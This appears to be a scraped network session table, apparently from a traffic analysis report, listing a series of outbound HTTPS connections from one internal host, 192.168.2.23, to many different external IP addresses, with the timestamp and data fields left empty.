                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18172192.168.2.2357466168.51.161.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18173192.168.2.235786225.138.42.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18174192.168.2.2340022115.73.222.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18175192.168.2.234937889.244.88.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18176192.168.2.2358882194.11.205.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18177192.168.2.2345608172.76.125.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18178192.168.2.2351988194.210.254.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18179192.168.2.2343862201.122.224.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18180192.168.2.2358970201.198.235.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18181192.168.2.2346070167.76.159.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18182192.168.2.234447473.66.254.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18183192.168.2.2352172185.182.51.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18184192.168.2.235958876.177.142.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18185192.168.2.2347690151.195.25.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18186192.168.2.235655646.139.44.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18187192.168.2.234468085.50.190.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18188192.168.2.2346930105.141.159.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18189192.168.2.2348372103.136.162.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18190192.168.2.2357968128.211.76.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18191192.168.2.235603861.159.45.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18192192.168.2.2341756179.174.41.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18193192.168.2.2360342186.14.90.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18194192.168.2.234683045.76.132.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18195192.168.2.2338992222.103.169.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18196192.168.2.2339510152.79.251.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18197192.168.2.2336856116.118.174.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18198192.168.2.2345058134.39.151.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18199192.168.2.235785647.79.201.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18200192.168.2.2343718194.67.99.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18201192.168.2.235869466.110.196.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18202192.168.2.2336324107.112.43.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18203192.168.2.2355920202.137.11.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18204192.168.2.234032487.202.118.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18205192.168.2.2339488102.70.233.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18206192.168.2.235824474.233.140.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18207192.168.2.2353966201.117.32.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18208192.168.2.2358664181.146.203.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18209192.168.2.23603925.219.24.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18210192.168.2.23506761.234.3.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18211192.168.2.2338776147.38.207.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18212192.168.2.2334752202.158.38.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18213192.168.2.23332341.133.140.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18214192.168.2.235511275.0.156.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18215192.168.2.2354634178.244.223.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18216192.168.2.2346144134.2.82.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18217192.168.2.234969881.189.78.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18218192.168.2.234286235.191.13.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18219192.168.2.235524264.114.248.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18220192.168.2.2340674172.66.183.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18221192.168.2.2344836128.37.192.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18222192.168.2.2359984210.92.208.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18223192.168.2.233594819.183.184.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18224192.168.2.2340028101.111.136.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18225192.168.2.236038412.250.134.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18226192.168.2.234590868.34.124.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18227192.168.2.2338904118.0.83.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18228192.168.2.2345196123.184.197.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18229192.168.2.2343130209.237.83.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18230192.168.2.235225076.54.218.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18231192.168.2.2338488125.202.133.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18232192.168.2.2346808143.141.64.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18233192.168.2.233363644.45.172.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18234192.168.2.233725435.13.115.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18235192.168.2.234995672.14.156.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18236192.168.2.233602242.223.132.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18237192.168.2.2335744145.241.167.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18238192.168.2.234797254.56.29.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18239192.168.2.2352964143.39.87.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18240192.168.2.2340252107.161.11.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18241192.168.2.233591897.195.90.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18242192.168.2.2351610129.0.156.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18243192.168.2.2356394167.135.125.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18244192.168.2.2335456183.15.113.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18245192.168.2.2346662222.175.190.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18246192.168.2.234508673.3.104.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18247192.168.2.2341226142.22.156.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18248192.168.2.234466636.136.69.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18249192.168.2.2355630109.234.103.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18250192.168.2.2339092212.79.143.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18251192.168.2.2351792173.185.31.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18252192.168.2.2353110109.42.57.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18253192.168.2.233903638.170.130.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18254192.168.2.2358192150.177.219.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18255192.168.2.235399625.37.151.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18256192.168.2.2342636144.7.206.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18257192.168.2.235223091.209.131.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18258192.168.2.235580644.12.57.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18259192.168.2.2345832184.141.200.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18260192.168.2.2359448211.150.146.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18261192.168.2.2346248175.218.19.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18262192.168.2.2333512146.225.136.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18263192.168.2.2337210192.100.69.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18264192.168.2.234120297.173.64.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18265192.168.2.234232418.191.207.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18266192.168.2.233496649.159.118.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18267192.168.2.2352126152.5.140.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18268192.168.2.236030283.110.85.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18269192.168.2.2344810179.148.188.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18270192.168.2.235639239.249.167.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18271192.168.2.2356364117.191.204.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18272192.168.2.2343654161.135.150.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18273192.168.2.2347550172.140.17.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18274192.168.2.233481020.151.198.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18275192.168.2.233638067.16.229.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18276192.168.2.2360734151.92.27.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18277192.168.2.235485872.103.127.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18278192.168.2.23369764.29.81.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18279192.168.2.235012264.96.77.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18280192.168.2.2356998197.172.240.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18281192.168.2.2341690123.250.19.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18282192.168.2.233343027.201.100.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18283192.168.2.2357198141.25.60.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18284192.168.2.234946860.26.66.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18285192.168.2.2344492204.234.161.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18286192.168.2.2347400167.90.22.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18287192.168.2.2336422176.44.103.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18288192.168.2.235882647.98.201.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18289192.168.2.235511896.181.112.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18290192.168.2.2338622125.79.132.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18291192.168.2.2339132216.122.59.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18292192.168.2.233810085.59.98.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18293192.168.2.233316859.228.207.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18294192.168.2.234451684.178.17.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18295192.168.2.2342296221.221.217.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18296192.168.2.235773835.151.152.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18297192.168.2.233350041.249.6.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18298192.168.2.2353790103.192.170.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18299192.168.2.2333930130.61.184.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18300192.168.2.233750854.230.172.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18301192.168.2.234310881.21.93.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18302192.168.2.2355640130.100.130.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18303192.168.2.2346286176.101.34.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18304192.168.2.2349040164.36.25.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18305192.168.2.234165640.7.223.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18306192.168.2.2359680123.230.43.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18307192.168.2.234662653.103.98.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18308192.168.2.234964236.118.149.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18309192.168.2.2357246211.203.27.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18310192.168.2.2334272216.130.156.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18311192.168.2.2353990202.136.127.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18312192.168.2.2339992144.76.244.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18313192.168.2.2340136145.182.64.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18314192.168.2.2357068208.133.40.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18315192.168.2.2336714180.65.27.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18316192.168.2.23519745.247.161.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18317192.168.2.234359050.204.223.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18318192.168.2.2352312178.169.213.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18319192.168.2.2337596103.211.180.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18320192.168.2.2333140210.83.188.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18321192.168.2.233831235.59.157.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18322192.168.2.2346332126.121.73.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18323192.168.2.235295677.194.171.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18324192.168.2.233529482.95.34.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18325192.168.2.233702659.91.54.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18326192.168.2.2343406109.69.62.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18327192.168.2.2336010223.80.110.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18328192.168.2.2354514174.93.153.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18329192.168.2.2344634149.59.17.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18330192.168.2.2350376221.31.65.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18331192.168.2.2342428156.100.153.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18332192.168.2.233600437.65.166.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18333192.168.2.2341174176.153.11.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18334192.168.2.2348154213.31.186.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18335192.168.2.2332824134.159.203.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18336192.168.2.2336284118.154.147.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18337192.168.2.2340422125.29.174.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18338192.168.2.2344176114.131.211.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18339192.168.2.2360586130.143.0.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18340192.168.2.2346086196.125.74.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18341192.168.2.2342086109.226.147.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18342192.168.2.2359810199.190.46.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18343192.168.2.2336218210.212.172.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18344192.168.2.23585724.204.157.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18345192.168.2.2351584132.99.77.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18346192.168.2.2344444124.227.180.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18347192.168.2.2346646136.130.152.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18348192.168.2.2341404131.253.229.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18349192.168.2.234872880.222.115.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18350192.168.2.235285675.161.240.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18351192.168.2.235142467.135.151.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18352192.168.2.233330093.204.15.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18353192.168.2.2359912123.56.248.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18354192.168.2.233459281.137.249.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18355192.168.2.2351184152.179.122.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18356192.168.2.233382090.32.84.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18357192.168.2.2341084180.243.75.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18358192.168.2.2348004179.4.233.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18359192.168.2.2338750140.170.93.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18360192.168.2.2341886185.47.3.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18361192.168.2.233853493.37.207.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18362192.168.2.234871491.252.31.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18363192.168.2.2337676103.160.154.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18364192.168.2.235911873.148.177.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18365192.168.2.2340520149.174.229.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18366192.168.2.2348238179.225.251.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18367192.168.2.2351508142.205.214.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18368192.168.2.234058487.147.53.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18369192.168.2.23356785.87.69.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18370192.168.2.233759438.132.63.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18371192.168.2.234920287.91.34.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18372192.168.2.2338736213.86.69.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18373192.168.2.2341060132.91.215.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18374192.168.2.2349062209.89.42.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18375192.168.2.2333498141.188.59.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18376192.168.2.234472684.141.102.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18377192.168.2.234506260.139.76.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18378192.168.2.2338646170.106.183.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18379192.168.2.2342928133.210.225.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18380192.168.2.2355678136.4.1.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18381192.168.2.234369836.249.227.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18382192.168.2.2353806135.32.252.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18383192.168.2.2351214181.152.234.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18384192.168.2.234013648.241.188.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18385192.168.2.235198427.7.134.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18386192.168.2.234687247.232.24.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18387192.168.2.2347344167.182.206.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18388192.168.2.2344084162.104.167.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18389192.168.2.2357176120.77.147.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18390192.168.2.2338442208.224.200.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18391192.168.2.2354234200.236.114.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18392192.168.2.2358896103.44.210.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18393192.168.2.2351750171.152.20.1443
